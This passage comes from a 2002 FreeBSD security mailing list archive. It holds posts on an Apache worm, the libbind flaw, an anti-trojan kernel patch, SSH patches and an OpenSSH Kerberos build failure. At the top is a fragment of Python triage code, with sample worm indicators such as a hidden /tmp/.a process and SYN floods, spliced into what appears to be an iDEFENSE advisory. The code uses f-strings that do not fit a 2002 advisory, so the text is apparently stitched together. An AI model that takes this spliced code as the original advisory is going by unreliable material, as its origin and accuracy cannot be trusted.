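# Sample data: lines quoted in the analysis unless marked as constructed.
SAMPLE_LS = ("total 122\n"
             "-rwxr-xr-x 1 nobody wheel 51598 Jun 29 17:49 .a\n"
             "-rw-r--r-- 1 nobody wheel 71113 Jun 29 17:49 .uua\n")
SAMPLE_NETSTAT = (
    "Proto Recv-Q Send-Q Local Address Foreign Address (state)\n"
    "tcp4 0 0 *.ssh *.* LISTEN\n"
    "udp4 0 0 *.syslog *.*\n"
    "udp4 0 0 *.wizard *.*\n"
    # Constructed: 25 half-open connections to remote port 80.
    + "".join(f"tcp4 0 0 172.16.159.100.{1025 + i} 172.16.{i}.7.http SYN_SENT\n"
              for i in range(25))
)
SAMPLE_PS = ("nobody 1103 0.0 0.4 932 444 v1 S 6:46PM 0:00.00 "
             "/tmp/.a 172.16.159.57\n")
SAMPLE_ACCESS = [
    '172.16.159.57 - - [29/Jun/2002:15:06:41 -0400] "GET / HTTP/1.1" 400 378',
    # Constructed benign request:
    '10.0.0.5 - - [29/Jun/2002:15:07:02 -0400] "GET /index.html HTTP/1.0" 200 1456',
]
SAMPLE_ERROR = [
    "[Sat Jun 29 15:06:41 2002] [error] [client 172.16.159.57] client sent "
    "HTTP/1.1 request without hostname (see RFC2616 section 14.23): /",
]

if __name__ == "__main__":
    report = triage(SAMPLE_LS, SAMPLE_NETSTAT, SAMPLE_PS,
                    SAMPLE_ACCESS, SAMPLE_ERROR)
    for key, value in report.items():
        print(f"{key}: {value}")
```

The second element of each process tuple is the base host from the worm's command line, which the analysis notes identifies the system that infected this one.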
Michael Sutton Senior Security Engineer, iDEFENSE Labs msutton@idefense.com David Endler Director, iDEFENSE Labs dendler@idefense.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 18: 0:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5664F37B400 for ; Sun, 30 Jun 2002 18:00:13 -0700 (PDT) Received: from mta2-rme.xtra.co.nz (mta2-rme.xtra.co.nz [210.86.15.130]) by mx1.FreeBSD.org (Postfix) with ESMTP id 243A043E09 for ; Sun, 30 Jun 2002 18:00:07 -0700 (PDT) (envelope-from mike@netxsecure.net) Received: from netxsecure.net ([210.55.243.47]) by mta2-rme.xtra.co.nz with ESMTP id <20020701010005.RLWM14139.mta2-rme.xtra.co.nz@netxsecure.net> for ; Mon, 1 Jul 2002 13:00:05 +1200 Message-ID: <3D1FAB41.396C0D23@netxsecure.net> Date: Mon, 01 Jul 2002 13:07:13 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd security Subject: New V2 Anti-Trojan kernel patches -Improved and extended for FreeBSD 4.6 Release Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Our latest version of Anti-Trojan software, V2 is now available as a beta for FreeBSD 4.6 Release. V2 adds several new important Trojan Detection features with a big reduction in the overall impact on a running kernel. 
1.Cryptographic hash checking and filtering all files loaded through the memory map call mmap which covers: -Shared libraries -Loadable kernel modules 2.Activation very early in the boot cycle to provide warnings against Trojan files waiting to execute at boot time before the secure level is raised. 3.Improved efficiency in terms of system rescues used, providing very affordable increased security capabilities. 4.Cryptographic hash checking and filtering the Execve call including script files and an associated interpreter as the original reference version did yet utilizing the more efficient techniques from the V2 code. The link is: http://www.trojanproof.org/sigexec-fbsd4.6rV2-beta1.tgz Regards, Mike. -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 18:14: 2 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5F97837B400 for ; Sun, 30 Jun 2002 18:13:58 -0700 (PDT) Received: from m-net.arbornet.org (m-net.arbornet.org [209.142.209.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id D23A343E0A for ; Sun, 30 Jun 2002 18:13:57 -0700 (PDT) (envelope-from polytarp@m-net.arbornet.org) Received: from m-net.arbornet.org (localhost [127.0.0.1]) by m-net.arbornet.org (8.12.3/8.11.2) with ESMTP id g611EC1H009002; Sun, 30 Jun 2002 21:14:12 -0400 (EDT) (envelope-from polytarp@m-net.arbornet.org) Received: from localhost (polytarp@localhost) by m-net.arbornet.org (8.12.3/8.12.3/Submit) with ESMTP id g611EBdJ008999; Sun, 30 Jun 2002 21:14:11 -0400 (EDT) Date: Sun, 30 Jun 2002 21:14:11 -0400 (EDT) From: pgreen To: "Michael A. 
Williams" Cc: freebsd security Subject: Re: New V2 Anti-Trojan kernel patches -Improved and extended for FreeBSD 4.6 Release In-Reply-To: <3D1FAB41.396C0D23@netxsecure.net> Message-ID: <20020630211338.C8909-100000@m-net.arbornet.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You know, residents of London may not like your name of it. On Mon, 1 Jul 2002, Michael A. Williams wrote: > Hi, > > Our latest version of Anti-Trojan software, V2 is now available as a > beta for FreeBSD 4.6 Release. > > V2 adds several new important Trojan Detection features with a big > reduction in the overall impact on a running kernel. > > 1.Cryptographic hash checking and filtering all files loaded through the > memory map call mmap which covers: > -Shared libraries > -Loadable kernel modules > > 2.Activation very early in the boot cycle to provide warnings against > Trojan files waiting to execute at boot time before the secure level is > raised. > > 3.Improved efficiency in terms of system rescues used, providing very > affordable increased security capabilities. > > 4.Cryptographic hash checking and filtering the Execve call including > script files and an associated interpreter as the original reference > version did yet utilizing the more efficient techniques from the V2 > code. > > The link is: > http://www.trojanproof.org/sigexec-fbsd4.6rV2-beta1.tgz > > Regards, Mike. > > > -- > Michael A. 
Williams > Security Software Engineering and InfoSec Manager > NetXSecure NZ Limited, http://www.nxs.co.nz > Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19: 0: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DCE2037B400 for ; Sun, 30 Jun 2002 19:00:02 -0700 (PDT) Received: from mikehan.com (giles.mikehan.com [67.113.132.26]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3AE4143E0A for ; Sun, 30 Jun 2002 19:00:02 -0700 (PDT) (envelope-from mikehan@giles.mikehan.com) Received: from giles.mikehan.com (localhost [127.0.0.1]) by mikehan.com (8.12.3/8.12.3) with ESMTP id g61201h8062347; Sun, 30 Jun 2002 19:00:01 -0700 (PDT) (envelope-from mikehan@giles.mikehan.com) Received: (from mikehan@localhost) by giles.mikehan.com (8.12.3/8.12.3/Submit) id g612015Z062346; Sun, 30 Jun 2002 19:00:01 -0700 (PDT) Date: Sun, 30 Jun 2002 19:00:01 -0700 From: Michael Han To: Brett Glass Cc: security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Message-ID: <20020630190001.L31022@giles.mikehan.com> References: <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> <3D1E2D22.EBCE8199@FreeBSD.org> <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <4.3.2.7.2.20020629180311.02b5b2d0@localhost>; from brett@lariat.org on Sat, Jun 29, 2002 at 06:06:58PM -0600 Sender: 
owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 06:06:58PM -0600, Brett Glass wrote: > At 03:56 PM 6/29/2002, Doug Barton wrote: > > >You quoted the second page. The URL I left in the quotation above is the > >announcement for 8.2.6, which says: > > > >Highlights vs. 8.2.5 > > Security Fix libbind. All applications linked against libbind > > need to relinked. > > So? That's not the version of libbind that's in 9.2.1. The version > in 9.2.1 is vulnerable; I've checked the source. Brett, your postings suggest that you don't understand the nature of the bug and libbind. libbind is an optional component which the vast majority of FreeBSD users would not have installed on their systems. Bind itself does not link to it in the default installation, and under no circumstances is the Bind named server a vector for risk. Only by installing the vulnerable libbind and linking software against it (this would not be the default behavior of any normally ported/portable software) can an installation of Bind introduce risk. libbind is a *replacement* library (or it's possible that it could serve as the only implementation on a truly ancient and backwards system) providing name service resolution to applications that need that. Normally these services are gotten from the native C library, libc. It takes some serious doing to cause any software on your system to be at risk because of a Bind installation, hence several rather patient people trying to explain that you're greatly exaggerating the risk and causing needless confusion. -- mikehan+^$#&*@mikehan.com http://www.mikehan.com/ coffee achiever San Francisco, California "Notice how I blame my own mistakes on the lack of rules?" 
- Dan Espen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19: 8:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F1BDE37B400 for ; Sun, 30 Jun 2002 19:08:49 -0700 (PDT) Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0BF4743E13 for ; Sun, 30 Jun 2002 19:08:48 -0700 (PDT) (envelope-from marka@drugs.dv.isc.org) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g6128hm0066820; Mon, 1 Jul 2002 12:08:43 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200207010208.g6128hm0066820@drugs.dv.isc.org> To: Brett Glass Cc: Pete Ehlke , security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one In-reply-to: Your message of "Sat, 29 Jun 2002 22:10:05 CST." <4.3.2.7.2.20020629220046.02bed9a0@localhost> Date: Mon, 01 Jul 2002 12:08:43 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > At 07:18 PM 6/29/2002, Pete Ehlke wrote: > > >You are aware, Brett, that you are lecturing one of the BIND authors on > >the subtleties of the BIND source? > > > >Once and for all: there is a fixed 8.3.x. There is a fixed 8.2.x. There > >is even a fixed v4. > > In short, you've gone back and created fixed versions of these > "ancient" bloodlines? > > If so, that's good, but it doesn't help the majority of us. You have been told how to fix the problem. Install libbind from BIND 8 (that implies the include files). 
BIND9: don't call configure with --enable-libbind (this is the default) BIND8: remove "bin" from "SUBDIRS= include port lib bin" in the top level Makefile Install both BIND 8 and BIND 9. "--enable-libbind" effectively does just that. Mark > In particular, it doesn't help people who install FreeBSD now, > or who maintain it and need to make sure that everything's fixed. > We need BIND 9 (required to shield other systems, including Solaris > and Windows boxes, which are likely vulnerable) and a fixed > libbind. Oh, and a fixed Sendmail, which right now can only > be had if one risks installing a -STABLE snapshot. (4.6-RELEASE-p1, > for some reasond, does not have it.) And you can't install > binary packages if they contain statically linked binaries. > > In short, right now, it's damnably difficult to secure existing > FreeBSD systems or to create new ones (for which I have clients > waiting). So, pardon me if I seem frustrated. I'm responsible > for plugging all the holes in the dikes and for building several > systems that I cannot, right now, build with confidence. 
> > --Brett > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19:31:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 47A8C37B405 for ; Sun, 30 Jun 2002 19:30:42 -0700 (PDT) Received: from relay1.kornet.net (relay1.kornet.net [211.48.62.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id A666A43E0A for ; Sun, 30 Jun 2002 19:30:41 -0700 (PDT) (envelope-from amimi0404@kornet.net) Received: from ns (61.73.89.202) by relay1.kornet.net; 1 Jul 2002 11:30:37 +0900 Message-ID: <3d1fbed03e07e08c@relay1.kornet.net> (added by relay1.kornet.net) From: =?ks_c_5601-1987?B?v+y4rsSrteXIuL/4IL+1vvfGwMDl?= To: freebsd-security@freebsd.org Subject: =?ks_c_5601-1987?B?W7GksO1dIGZyZWVic2Qtc2VjdXJpdHm01CDA57nMwNa0wiC758C6x7DAuyC15biusNq9wLTPtNkh?= Date: Mon, 01 Jul 2002 11:35:48 +0900 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0117_01C0F35A.93A48C00" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jun 30 19:42: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from
mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7633837B400 for ; Sun, 30 Jun 2002 19:42:05 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 9C30843E0A for ; Sun, 30 Jun 2002 19:42:04 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id UAA07543; Sun, 30 Jun 2002 20:41:46 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020630203234.00c65d60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 30 Jun 2002 20:37:52 -0600 To: Michael Han From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: security@FreeBSD.ORG In-Reply-To: <20020630190001.L31022@giles.mikehan.com> References: <4.3.2.7.2.20020629180311.02b5b2d0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> <4.3.2.7.2.20020629154457.02fafb00@localhost> <3D1E2D22.EBCE8199@FreeBSD.org> <4.3.2.7.2.20020629180311.02b5b2d0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 08:00 PM 6/30/2002, Michael Han wrote:

>Brett, your postings suggest that you don't understand the nature of
>the bug and libbind. libbind is an optional component which the vast
>majority of FreeBSD users would not have installed on their systems.

This is good.

>Bind itself does not link to it in the default installation, and under
>no circumstances is the Bind named server a vector for risk.

Yes, that's what the CERT advisory said.

>Only by installing the vulnerable libbind and linking software against it
>(this would not be the default behavior of any normally
>ported/portable software) can an installation of Bind introduce risk.

That's what I'm concerned about. I want to make sure that I install a version that's not vulnerable, in case I do bring in something that links to it. ISC's description of the library suggests that it's useful and that apps do link to it.

>libbind is a *replacement* library (or it's possible that it could
>serve as the only implementation on a truly ancient and backwards
>system) providing name service resolution to applications that need
>that. Normally these services are gotten from the native C library,
>libc.

Which is another problem. I've got some machines dating back to FreeBSD 2.2.7 and 2.2.8 here, some of which I cannot just upgrade because they're running embedded systems or custom code. I've got to find a way to patch them. Hence the concern.

The latest gaggle of bugs is so pervasive that it's difficult to create new machines in which one can be confident, much less patch the older ones. I really hope that there will be a 4.6.1.

--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Jun 30 19:42:21 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 28B6D37B400 for ; Sun, 30 Jun 2002 19:42:20 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6195043E09 for ; Sun, 30 Jun 2002 19:42:19 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id UAA07547; Sun, 30 Jun 2002 20:41:55 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020630203852.00c6d280@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sun, 30 Jun 2002 20:40:27 -0600 To: Mark.Andrews@isc.org From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Pete Ehlke , security@FreeBSD.ORG In-Reply-To: <200207010208.g6128hm0066820@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 08:08 PM 6/30/2002, Mark.Andrews@isc.org wrote:

> You have been told how to fix the problem. Install libbind
> from BIND 8 (that implies the include files).
>
> BIND9:
>   don't call configure with --enable-libbind (this is the default)
> BIND8:
>   remove "bin" from "SUBDIRS= include port lib bin" in the top
>   level Makefile
>
> Install both BIND 8 and BIND 9. "--enable-libbind" effectively
> does just that.

I'll do this. It'll be a bunch of work to do it on several systems.... I wish there were up-to-date binary packages! I may try to create a binary package for BIND 8's libbind to make this easier.
--Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Mon Jul 1 2: 8: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A3F4E37B400 for ; Mon, 1 Jul 2002 02:08:01 -0700 (PDT) Received: from grouper.daryl.org (64-51-175-231.client.dsl.net [64.51.175.231]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8F3EC43E0A for ; Mon, 1 Jul 2002 02:07:52 -0700 (PDT) (envelope-from Elan@daryl.org) Received: from ten ([209.214.90.4]) by grouper.daryl.org with Microsoft SMTPSVC(5.0.2195.2966); Mon, 1 Jul 2002 05:06:10 -0400 From: "Elan Hasson" To: "Brett Glass" , , "Domas Mituzas" Cc: , , Subject: RE: Apache worm in the wild Date: Mon, 1 Jul 2002 05:06:33 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal In-Reply-To: <4.3.2.7.2.20020628112127.024d9410@localhost> X-OriginalArrivalTime: 01 Jul 2002 09:06:12.0065 (UTC) FILETIME=[8BD58510:01C220DE] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dunno if anyone saw this: http://news.com.com/2100-1001-940585.html -----Original Message----- From: Brett Glass [mailto:brett@lariat.org] Sent: Friday, June 28, 2002 1:27 PM To: flynn@energyhq.homeip.net; Domas Mituzas Cc: freebsd-security@FreeBSD.ORG; bugtraq@securityfocus.com; os_bsd@konferencijos.lt Subject: Re: Apache worm in the wild At 05:38 AM 6/28/2002, flynn@energyhq.homeip.net wrote: >I wonder how many variants of this kind of thing we'll see, but I assume most people >running Apache have upgraded already.
Upgrading Apache may prevent your system from being taken over, but it doesn't necessarily prevent it from being DoSed. One of my Apache servers, which had been upgraded to 2.0.39, went berserk on June 25th, spawning the maximum number of child processes and then locking up. The server did not appear to have been infiltrated, but the logs were filled with megabytes of messages indicating that the child processes were repeatedly trying to free chunks of memory that were already free. Probably the result of an attempted exploit going awry. (It could have been aimed at Linux, or at a different version of Apache; can't tell. But clearly it got somewhere, though not all the way.)

--Brett

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 3:24:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1EC0037B400 for ; Mon, 1 Jul 2002 03:24:31 -0700 (PDT) Received: from eowyn.vianetworks.nl (eowyn.vianetworks.nl [212.61.25.227]) by mx1.FreeBSD.org (Postfix) with ESMTP id 71B4243E09 for ; Mon, 1 Jul 2002 03:24:30 -0700 (PDT) (envelope-from joao@bowtie.nl) Received: from uucp.iae.nl (uucp.iae.nl [212.61.26.37]) by eowyn.vianetworks.nl (Postfix) with ESMTP id 1693A210D0 for ; Mon, 1 Jul 2002 12:24:29 +0200 (CEST) Received: (from uucp@localhost) by uucp.iae.nl (8.9.1/8.9.1) with IAEhv.nl id MAA11218 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 12:24:29 +0200 (MET DST) Received: from bowtie.nl (hume.intra.bowtie.nl [192.168.4.13]) by bowtie.nl (8.11.1/8.11.1) with ESMTP id g61ALMK24196 for ; Mon, 1 Jul 2002 12:21:22 +0200 (CEST) (envelope-from joao@bowtie.nl) Message-ID: <3D202D22.DFEBDF72@bowtie.nl> Date: Mon, 01 Jul 2002 12:21:22 +0200 From: Joao Schim Organization: BowTie Technology BV X-Mailer: Mozilla 4.72 [en] (X11; I; FreeBSD 4.0-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: SSH Patches References: <20020628193052.A42173-100000@blues.jpj.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Trevor Johnson wrote:
>
> > Are there going to be patches for the bundled FreeBSD OpenSSH anytime
> > soon, so I can patch my 4.6-RELEASE system? :)
>
> Have you found a bug in your OpenSSH?
>

You mean that the other bugs Theo de Raadt spoke about (those 5600 lines) don't concern FreeBSD 4.6-RELEASE ? iirc there were more issues than just those pointed out by ISS.

*confused*

Regards

Joao

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 4:28:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 93C5E37B400 for ; Mon, 1 Jul 2002 04:28:47 -0700 (PDT) Received: from public.uni-hamburg.de (public.uni-hamburg.de [134.100.32.55]) by mx1.FreeBSD.org (Postfix) with ESMTP id B1A9043E1A for ; Mon, 1 Jul 2002 04:28:46 -0700 (PDT) (envelope-from sa9k063@public.uni-hamburg.de) Received: (from sa9k063@localhost) by public.uni-hamburg.de (8.11.0/8.11.0) id g61BSje18914 for freebsd-security@freebsd.org; Mon, 1 Jul 2002 13:28:45 +0200 Date: Mon, 1 Jul 2002 13:28:45 +0200 From: Tilo Kremer To: freebsd-security@freebsd.org Subject: other DoSes Message-ID: <20020701132845.A88200@public.uni-hamburg.de> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

hi,

apart from the apache worm, on friday i saw some other weird things going on on my freebsd machines:

my dns was flooding my mx. resolver:53 -> mx:1032
contents of my sshd_config were changed (ChallengeResponse, PAMAuthenticationViaKbdInt)

this looks like having been attacked on all fronts at the same time. i am ready to send logs upon request.

grtx, t

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Jul 1 5: 0:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 140F337B400; Mon, 1 Jul 2002 05:00:05 -0700 (PDT) Received: from smtp02.iafrica.com (smtp02.iafrica.com [196.7.0.140]) by mx1.FreeBSD.org (Postfix) with ESMTP id 01A9E43E55; Mon, 1 Jul 2002 05:00:02 -0700 (PDT) (envelope-from gareth@za.uu.net) Received: from gabba.so.cpt1.za.uu.net ([196.30.72.25]) by smtp02.iafrica.com with esmtp (Exim 3.20 #1) id 17OzqL-000Pct-00; Mon, 01 Jul 2002 13:59:45 +0200 Received: from localhost ([127.0.0.1]) by gabba.so.cpt1.za.uu.net with esmtp (Exim 3.31 #1) id 17Ozq6-0003CB-00; Mon, 01 Jul 2002 13:59:31 +0200 Date: Mon, 1 Jul 2002 13:59:30 +0200 (SAST) From: Gareth Hopkins X-X-Sender: ghopkins@gabba.so.cpt1.za.uu.net To: FreeBSD user Cc: Scott Gerhardt , FreeBSD , Subject: Re: Sshd fix In-Reply-To: <20020628190711.M7121-100000@Amber.XtremeDev.com> Message-ID: <20020701135406.W11499-100000@gabba.so.cpt1.za.uu.net> X-Cell: +27 82 389 5389 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Fri, 28 Jun 2002, FreeBSD user wrote:

Fu>cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE
Fu>install distclean

howdie,

I am having trouble building this with Kerberos 5 support.
make.conf looks like this

USA_RESIDENT=NO
MASTER_SITE_OVERRIDE=ftp://ftp3.za.freebsd.org/pub/FreeBSD/distfiles/${DIST_SUBDIR}/
NO_SENDMAIL= true
MAKE_KERBEROS5= yes
ENABLE_SUID_K5SU= yes
KRB5_HOME=/usr

The command I am using is

[root@foobar] /usr/ports/security/openssh-portable # WITH_KERBEROS5=yes make -DOPENSSH_OVERWRITE_BASE

I then get this error message.

cc -o ssh ssh.o sshconnect.o sshconnect1.o sshconnect2.o sshtty.o readconf.o clientloop.o -L. -Lopenbsd-compat/ -L/usr/lib -L/usr/lib -lssh -lopenbsd-compat -lutil -lz -lcrypto -lkrb5 -ldes -lcom_err -lasn1 -lroken
/usr/lib/libkrb5.so: undefined reference to `crypt'
*** Error code 1

Stop in /usr/ports/security/openssh-portable/work/openssh-3.4p1.
*** Error code 1

Stop in /usr/ports/security/openssh-portable.

There is a patch in the Makefile but when I run this patch from the makefile I get

[root@foobar] /usr/ports/security/openssh-portable # WITH_KERBEROS5=yes make -DOPENSSH_OVERWRITE_BASE
===> Extracting for openssh-overwrite-base-3.4p1_2
>> Checksum OK for openssh-3.4p1.tar.gz.
>> Checksum OK for openssh-3.4p1-gssapi-20020627.diff.
===> openssh-overwrite-base-3.4p1_2 depends on executable: autoconf - found
===> Patching for openssh-overwrite-base-3.4p1_2
===> Applying extra patch /usr/ports/security/openssh-portable/files/servconf.c.patch
===> Applying FreeBSD patches for openssh-overwrite-base-3.4p1_2
Applying extra patch for GSS-API key-exchange...
1 out of 6 hunks failed--saving rejects to session.c.rej
*** Error code 1

Stop in /usr/ports/security/openssh-portable.

If I apply the patches manually from openssh-3.4p1-gssapi-20020627.diff. the patch works but then the make breaks.

Anyone else having this problem?
---
Gareth Hopkins
Server Operations
UUNET South Africa
(o) +27.21.658.8700
(f) +27.21.658.8552
